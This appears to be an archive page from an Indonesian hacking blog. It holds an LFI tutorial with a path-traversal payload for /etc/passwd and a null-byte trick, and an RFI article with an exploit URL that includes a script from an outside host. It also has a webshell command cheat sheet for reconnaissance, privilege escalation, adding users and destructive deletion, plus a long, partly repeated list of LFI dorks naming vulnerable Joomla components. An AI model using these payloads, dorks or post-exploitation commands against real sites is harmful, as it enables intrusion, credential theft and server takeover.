Get The Code And Feel The Soul: July 2010

Local File Inclusion (LFI)

Bagaimana Bug seperti bisa ada?

Disisi programer : Bagaimana cara pencegahan yang programer lakukan untuk mencegahnya.. ?
Disisi Attacker : Bagaimana cara menggunakan bug ini untuk penyerangan..?

sebelumnya apa sih LFI dan RFI itu??
LFI (Local File Inclusion) adalah sebuah lubang pada site dimana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

fungsi-fungsi yang dapat menyebabkan LFI/RFI:
include();
include_once();
require();
require_once();

Dengan syarat pada kofigurasi server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

masuk ke example
kita misal kan kita punya file index.php dengan content seperti ini

Code:
include($page);
?>

misal $page=main.php
mungkin di url akan terlihat seperti ini bentuknya
h**p://www.sitevulnerable.com/index.php?page=main.php
maka script ini akan menampilkan halaman main.php.

nah disini attacker akan dapat melakukan LFI karena variable page di include begitu saja.
misal attacker ingin mengakses file passwd yang ada pada sever maka dia mungkin akan memasukan seperti ini ../../../../../../../../../etc/passwd << dengan jumlah "../" itu tergantung dari kedalam folder file index.php tersebut.. dengan begitu isi file passwd akan ditampilkan di browser.
dengan kita bisa menebak folder" dalam site.. ^^

tapi seandainya terdapat error seperti
Quote

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2

liat pada passwd ternyata dia di tambah dengan extensi .php berarti code yang digunakan untuk include adalah seperti ini

Code:

include($page.".php");
?>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

h**p://www.sitevulnerable.com/index.php?page=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter setelah ini di sebut teknik null injection.
itu LFI.

Source

Remote File Inclusion (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi’)
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. “/file…”)
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:

…
include($my_ms["root"].’/error.php’);
…

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script

Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
————-

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi…!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
——————————

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan “NO SYSTEMS IS SAFE!”.
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
————————-

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
——

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
———

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down… We love
streaming vids! Yeah!)

Source

Perintah Webshell

cat ./../mainfile.php = Config file.

ls -la = Lists directory’s.

ifconfig {eth0 etc} = Ipconfig equiv.

ps aux – Show running proccess’s.

gcc in_file -o out_file – Compile c file.

cat /etc/passwd – List’s accounts.

sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.

id – Tells you what user your logged in as.

which wget curl w3m lynx – Check’s to see what downloaders are
present.

uname -r – Shows all release info (or) cat /etc/release.

uname -a – Shows all kernal info (or) cat /etc/issue

last -30 – Last logged 30 ip’s can change to desired number.

useradd – Create new user account.

usermod – Modify user account.

w – See who is currently logged on.

locate password.txt – Locates password.txt in current dur can use *.

rm -rf / – Please be carefull with this command, i cannot stress this
enough.

arp -a – Lists other machines are on the same subnet.

lsattr -va – ls file attributes on linux second extended file system

find / -type f -perm -04000 -ls – Finds suid files.

find . -type f -perm -04000 -ls – Finds suid files in current dir.

find / -type f -perm -02000 -ls – Finds all sgid files.

find / -perm -2 -ls – Finds all writable files and folders.

find . -perm -2 -ls – Finds all writable files and folders in current dir.

find / -type f -name .bash_history – Finds bash history.

netstat -an | grep -i listen – shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.

find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.

cat /proc/version /proc/cpuinfo – Cpu info.

locate gcc- Finds gcc if installed.

set – Display system variables.

echo $path- Echo current path.

lsmod- Dumps kernal modules.

mount/df- Check mounted file system.

rpm -qa- Check patch level for RedHat 7.0.

dmesg- Check hardware ino.

cat /etc/syslog.conf – Log file.

uptime – Uptime check.

cat /proc/meminfo – Memory check.

find / -type f -perm -4 -print 2> /dev/null- Find readble files.

find / -type f -perm -2 -print 2> /dev/null – Find writable files.

chmod ### $folder – Chmod folder.

ls -l -b – Verbosly list directory’s

Silahkan ditambahkan sendiri ^:)^

Source

Bug Dork LFI

!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"
!lfi /index.php?option=com_juliaportfolio&controller= "com_juliaportfolio"
!lfi /index.php?option=com_sbsfile&controller= "com_sbsfile"
!lfi /index.php?option=com_rokdownloads&controller= "com_rokdownloads"
!lfi /index.php?option=com_sectionex&controller= "com_sectionex"
!lfi /index.php?option=com_ganalytics&controller= "com_ganalytics"
!lfi /index.php?option=com_janews&controller= "com_janews"
!lfi /index.php?option=com_linkr&controller= "com_linkr"
!lfi /index.php?option=com_rpx&controller= "com_rpx"
!lfi /index.php?option=com_ninjarsssyndicator&controller= "com_ninjarsssyndicator"
!lfi /index.php?option=com_gcalendar&controller= "com_gcalendar"
!lfi /index.php?option=com_ckforms&controller= "com_ckforms"
!lfi /index.php?option=com_jeformcr&view= "com_jeformcr"
!lfi /index.php?option=com_jresearch&controller= "com_jresearch"
!lfi /index.php?option=com_smestorage&controller= "com_smestorage"
!lfi /index.php?option=com_properties&controller= "com_properties"
!lfi /index.php?option=com_dwgraphs&controller= "com_dwgraphs"
!lfi /index.php?option=com_weberpcustomer&controller= "com_weberpcustomer"
!lfi /index.php?option=com_userstatus&controller= "com_userstatus"
!lfi /index.php?option=com_econtent&controller= "com_econtent"
!lfi /index.php?option=com_jvehicles&controller= "com_jvehicles"
!lfi /index.php?option=com_joomlapicasa2&controller= "com_joomlapicasa2"
!lfi /index.php?option=com_svmap&controller= "com_svmap"
!lfi /index.php?option=com_shoutbox&controller= "com_shoutbox"
!lfi /index.php?option=com_loginbox&view= "com_loginbox"
!lfi /index.php?option=com_bca-rss-syndicator&controller= "com_bca-rss-syndicator"
!lfi /index.php?option=com_joomlaupdater&controller= "com_joomlaupdater"
!lfi /index.php?option=com_redshop&view= "com_redshop"
!lfi /index.php?option=com_redtwitter&view= "com_redtwitter"
!lfi /index.php?option=com_wisroyq&controller= "com_wisroyq"
!lfi /index.php?option=com_jinventory&controller= "com_jinventory"
!lfi /index.php?option=com_appointment&controller= "com_appointment"
!lfi /index.php?option=com_datafeeds&controller= "com_datafeeds"
!lfi /index.php?option=com_fabrik&controller= "com_fabrik"
!lfi /index.php?option=com_hsconfig&controller= "com_hsconfig"
!lfi /index.php?option=com_joomlaflickr&controller= "com_joomlaflickr"
!lfi /index.php?option=com_jukebox&controller= "com_jukebox"
!lfi /index.php?option=com_jwhmcs&controller= "com_jwhmcs"
!lfi /index.php?option=com_sebercart&view= "com_sebercart"
!lfi /index.php?option=com_awiki&controller= "com_awiki"
!lfi /index.php?option=com_vjdeo&controller= "com_vjdeo"
!lfi /index.php?option=com_awdwall&controller= "com_awdwall"
!lfi /index.php?option=com_realtyna&controller= "com_realtyna"
!lfi /index.php?option=com_webeecomment&controller= "com_webeecomment"
!lfi /index.php?option=com_javoice&view= "com_javoice"
!lfi /index.php?option=com_foobla_suggestions&controller= "com_foobla_suggestions"
!lfi /index.php?option=com_powermail&controller= "com_powermail"
!lfi /index.php?option=com_pcchess&controller= "com_pcchess"
!lfi /index.php?option=com_spsnewsletter&controller= "com_spsnewsletter"
!lfi /index.php?option=com_alphauserpoints&view= "com_alphauserpoints"
!lfi /index.php?option=com_travelbook&controller= "com_travelbook"
!lfi /index.php?option=com_tweetla&controller= "com_tweetla"
!lfi /index.php?option=com_ticketbook&controller= "com_ticketbook"
!lfi /index.php?option=com_jajobboard&view= "com_jajobboard"
!lfi /index.php?option=com_jajobboard&controller= "com_jajobboard"
!lfi /index.php?option=com_jfeedback&controller= "com_jfeedback"
!lfi /index.php?option=com_jprojectmanager&controller= "com_jprojectmanager"
!lfi /index.php?option=com_preventive&controller= "com_preventive"
!lfi /index.php?option=com_myfiles&controller= "com_myfiles"
!lfi /index.php?option=com_onlineexam&controller= "com_onlineexam"
!lfi /index.php?option=com_joommail&controller= "com_joommail"
!lfi /index.php?option=com_memory&controller= "com_memory"
!lfi /index.php?option=com_market&controller= "com_market"
!lfi /index.php?option=com_diary&controller= "com_diary"
!lfi /index.php?option=com_webtv&controller= "com_webtv"
!lfi /index.php?option=com_horoscope&controller= "com_horoscope"
!lfi /index.php?option=com_arcadegames&controller= "com_arcadegames"
!lfi /index.php?option=com_flashgames&controller= "com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "com_addressbook"
!lfi /index.php?option=com_flexicontent&controller= "com_flexicontent"
!lfi /index.php?option=com_advertising&controller= "com_advertising"
!lfi /index.php?option=com_cvmaker&controller= "com_cvmaker"
!lfi /index.php?option=com_worldrates&controller= "com_worldrates"
!lfi /index.php?option=com_record&controller= "com_record"
!lfi /index.php?option=com_sweetykeeper&controller= "com_sweetykeeper"
!lfi /index.php?option=com_beeheard&controller= "com_beeheard"
!lfi /index.php?option=com_blogfactory&controller= "com_blogfactory"
!lfi /index.php?option=com_delicious&controller= "com_delicious"
!lfi /index.php?option=com_jacomment&view= "com_jacomment"
!lfi /index.php?option=com_lovefactory&controller= "com_lovefactory"
!lfi /index.php?option=com_mtfireeagle&controller= "com_mtfireeagle"
!lfi /index.php?option=com_photobattle&view= "com_photobattle"
!lfi /index.php?option=com_s5clanroster&view= "com_s5clanroster"
!lfi /index.php?option=com_s5clanroster&controller= "com_s5clanroster"
!lfi /index.php?option=com_wgpicasa&controller= "com_wgpicasa"
!lfi /index.php?option=com_zimbcomment&controller= "com_zimbcomment"
!lfi /index.php?option=com_zimbcore&controller= "com_zimbcore"
!lfi /index.php?option=com_gadgetfactory&controller= "com_gadgetfactory"
!lfi /index.php?option=com_matamko&controller= "com_matamko"
!lfi /index.php?option=com_archeryscores&controller= "com_archeryscores"
!lfi /index.php?option=com_multiroot&controller= "com_multiroot"
!lfi /index.php?option=com_multimap&controller= "com_multimap"
!lfi /index.php?option=com_drawroot&controller= "com_drawroot"
!lfi /index.php?option=com_google&controller= "com_google"
!lfi /index.php?option=com_if_surfalert&controller= "com_if_surfalert"
!lfi /index.php?option=com_orgchart&controller= "com_orgchart"
!lfi /index.php?option=com_mmsblog&controller= "com_mmsblog"
!lfi /index.php?option=com_wmi&controller= "com_wmi"
!lfi /index.php?option=com_ultimateportfolio&controller= "com_ultimateportfolio"
!lfi /index.php?option=com_noticeboard&controller= "com_noticeboard"
!lfi /index.php?option=com_smartsite&controller= "com_smartsite"
!lfi /index.php?option=com_graphics&controller= "com_graphics"
!lfi /index.php?option=com_php&file= "com_php"
!lfi /index.php?option=com_aardvertiser&task= "com_aardvertiser"
!lfi /index.php?option=com_jejob&view= "com_jejob"
!lfi /index.php?option=com_jeajaxeventcalendar&view= "com_jeajaxeventcalendar"
!lfi /index.php?option=com_dioneformwizard&controller= "com_dioneformwizard"
!lfi /index.php?option=com_jequoteform&view= "com_jequoteform"
!lfi /index.php?option=com_mscomment&controller= "com_mscomment"
!lfi /index.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_event&view= "com_event"
!lfi /index.php?option=com_product&controller= "com_product"
!lfi /index.php?option=com_job&controller= "com_job"
!lfi /index2.php?option=com_simpledownload&controller= "com_simpledownload"
!lfi /index.php?option=com_perchaimageattach&controller= "com_perchaimageattach"
!lfi /index.php?option=com_perchafieldsattach&controller= "com_perchafieldsattach"
!lfi /index.php?option=com_perchadownloadsattach&controller= "com_perchadownloadsattach"
!lfi /index.php?option=com_perchagallery&controller= "com_perchagallery"
!lfi /index.php?option=com_perchacategoriestree&controller= "com_perchacategoriestree"
!lfi /index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi /index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi /index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi /index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi /index.php?option=com_myfiles&controller= index.php?option=com_myfiles
!lfi /index.php?option=com_onlineexam&controller= "option=com_onlineexam"
!lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
!lfi /index.php?option=com_memory&controller= "option=com_memory"
!lfi /index.php?option=com_market&controller= "?option=com_market"
!lfi /index.php?option=com_diary&controller= index.php?option=com_diary
!lfi /index.php?option=com_worldrates&controller= option=com_worldrates
!lfi /index.php?option=com_record&controller= index.php?option=com_record
!lfi /index.php?option=com_sweetykeeper&controller= index.php?option=com_sweetykeeper
!lfi /index.php?option=com_wgpicasa&controller= index.php?option=com_wgpicasa
!lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
!lfi /index.php?option=com_photobattle&view= index.php?option=com_photobattle
!lfi /index.php?option=com_mtfireeagle&controller= index.php?option=com_mtfireeagle
!lfi /index.php?option=com_lovefactory&controller= index.php?option=com_lovefactory
!lfi /index.php?option=com_jacomment&view= option=com_jacomment
!lfi /index.php?option=com_delicious&controller= index.php?option=com_delicious&controller=
!lfi /index.php?option=com_blogfactory&controller= index.php?option=com_blogfactory
!lfi /index.php?option=com_sebercart&view= index.php?option=com_sebercart
!lfi /index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
!lfi /index.php?option=com_jukebox&controller= index.php?option=com_jukebox
!lfi /index.php?option=com_joomlaflickr&controller= index.php?option=com_joomlaflickr
!lfi /index.php?option=com_hsconfig&controller= index.php?option=com_hsconfig
!lfi /index.php?option=com_fabrik&controller= index.php?option=com_fabrik
!lfi /index.php?option=com_datafeeds&controller= index.php?option=com_datafeeds
!lfi /index.php?option=com_appointment&controller= /index.php?option=com_appointment
!lfi /index.php?option=com_awiki&controller= index.php?option=com_awiki
!lfi /index.php?option=com_webeecomment&controller= index.php?option=com_webeecomment
!lfi /index.php?option=com_realtyna&controller= index.php?option=com_realtyna
!lfi /index.php?option=com_powermail&controller= index.php?option=com_powermail
!lfi /index.php?option=com_foobla_suggestions&controller= option=com_foobla_suggestions
!lfi /index.php?option=com_pcchess&controller= index.php?option=com_pcchess
!lfi /index.php?option=com_tweetla&controller= index.php?option=com_tweetla
!lfi /index.php?option=com_ticketbook&controller= index.php?option=com_ticketbook
!lfi /index.php?option=com_jfeedback&controller= index.php?option=com_jfeedback
!lfi /index.php?option=com_jprojectmanager&controller= index.php?option=com_jprojectmanager
!lfi /index.php?option=com_spsnewsletter&controller= index.php?option=com_spsnewsletter
!lfi /index.php?option=com_alphauserpoints&view= ndex.php?option=com_alphauserpoints
!lfi /index.php?option=com_travelbook&controller= index.php?option=com_travelbook
!lfi /index.php?option=com_webtv&controller= index.php?option=com_webtv
!lfi /index.php?option=com_horoscope&controller= index.php?option=com_horoscope
!lfi /index.php?option=com_rd_download&view=download&cid= index.php?option=com_rd_download
!lfi /index.php?option=com_abbrev&controller= index.php?option=com_abbrev
!lfi /index.php?option=com_otzivi&controller= index.php?option=com_otzivi
!lfi /index.php?option=com_juliaportfolio&controller= index.php?option=com_juliaportfolio
!lfi /index.php?option=com_sbsfile&controller= index.php?option=com_sbsfile
!lfi /index.php?option=com_gcalendar&controller= index.php?option=com_gcalendar
!lfi /index.php?option=com_ninjarsssyndicator&controller= index.php?option=com_ninjarsssyndicator
!lfi /index.php?option=com_rpx&controller= index.php?option=com_rpx
!lfi /index.php?option=com_linkr&controller= index.php?option=com_linkr
!lfi /index.php?option=com_janews&controller= option=com_janews
!lfi /index.php?option=com_ganalytics&controller= index.php?option=com_ganalytics
!lfi /index.php?option=com_sectionex&controller= index.php?option=com_sectionex
!lfi /index.php?option=com_rokdownloads&controller= option=com_rokdownloads
!lfi /index.php?option=com_rwcards&view=rwcards&controller= index.php?option=com_rwcards
!lfi /index.php?option=com_news_portal&controller= index.php?option=com_news_portal
!lfi /index.php?option=com_jinventory&controller= index.php?option=com_jinventory
!lfi /index.php?option=com_wisroyq&controller= index.php?option=com_wisroyq
!lfi /index.php?option=com_redtwitter&view= /index.php?option=com_redtwitter
!lfi /index.php?option=com_redshop&view= index.php?option=com_redshop
!lfi /index.php?option=com_weberpcustomer&controller= index.php?option=com_weberpcustomer
!lfi /index.php?option=com_userstatus&controller= option=com_userstatus
!lfi /index.php?option=com_jvehicles&controller= index.php?option=com_jvehicles
!lfi /index.php?option=com_econtent&controller= index.php?option=com_econtent
!lfi /index.php?option=com_dwgraphs&controller= index.php?option=com_dwgraphs
!lfi /index.php?option=com_smestorage&controller= index.php?option=com_smestorage
!lfi /index.php?option=com_properties&controller= index.php?option=com_properties
!lfi /index.php?option=com_jeformcr&view= index.php?option=com_jeformcr

Local File Inclusion (LFI)

Remote File Inclusion (RFI)

Perintah Webshell

Bug Dork LFI

Archive

Partner

Categories

ListCountry